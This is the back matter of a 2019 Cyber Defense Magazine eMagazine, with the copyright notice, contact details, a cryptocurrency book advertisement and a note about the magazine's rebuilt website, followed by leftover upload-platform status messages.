All rights reserved worldwide. Copyright © <strong>2019</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved. No part of this<br />

newsletter may be used or reproduced by any means, graphic, electronic, or mechanical, including photocopying,<br />

recording, taping or by any information storage retrieval system without the written permission of the publisher<br />

except in the case of brief quotations embodied in critical articles and reviews. Because of the dynamic nature of<br />

the Internet, any Web addresses or links contained in this newsletter may have changed since publication and may<br />

no longer be valid. The views expressed in this work are solely those of the author and do not necessarily reflect<br />

the views of the publisher, and the publisher hereby disclaims any responsibility for them. Send us great content<br />

and we’ll post it in the magazine for free, subject to editorial approval and layout. Email us at<br />

marketing@cyberdefensemagazine.com<br />

<strong>Cyber</strong> <strong>Defense</strong> Magazine<br />

276 Fifth Avenue, Suite 704, New York, NY 1000<br />

EIN: 454-18-8465, DUNS# 078358935.<br />

All rights reserved worldwide.<br />

marketing@cyberdefensemagazine.com<br />

www.cyberdefensemagazine.com<br />

NEW YORK (US HQ), LONDON (UK/EU), HONG KONG (ASIA)<br />

<strong>Cyber</strong> <strong>Defense</strong> Magazine - <strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> rev. date: 11/01/<strong>2019</strong><br />

196


TRILLIONS ARE AT STAKE<br />

No 1 INTERNATIONAL BESTSELLER IN FOUR CATEGORIES<br />

Released:<br />

https://www.amazon.com/Cryptoconomy-Bitcoins-Blockchains-Bad-Guys-ebook/dp/B07KPNS9NH<br />

In Development:<br />

197


198


199


200


201


Nearly 8 Years in The Making…<br />

Thank You to our Loyal Subscribers!<br />

We've Completely Rebuilt <strong>Cyber</strong><strong>Defense</strong>Magazine.com - Please Let Us Know<br />

What You Think. It's mobile and tablet friendly and superfast. We hope you<br />

like it. In addition, we're shooting for 7x24x365 uptime as we continue to<br />

scale with improved Web App Firewalls, Content Deliver Networks (CDNs)<br />

around the Globe, Faster and More Secure DNS<br />

and <strong>Cyber</strong><strong>Defense</strong>MagazineBackup.com up and running as an array of live<br />

mirror sites.<br />

4m+ DNS queries monthly, 2m+ annual readers and new platforms coming…<br />

202


203


204


205

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!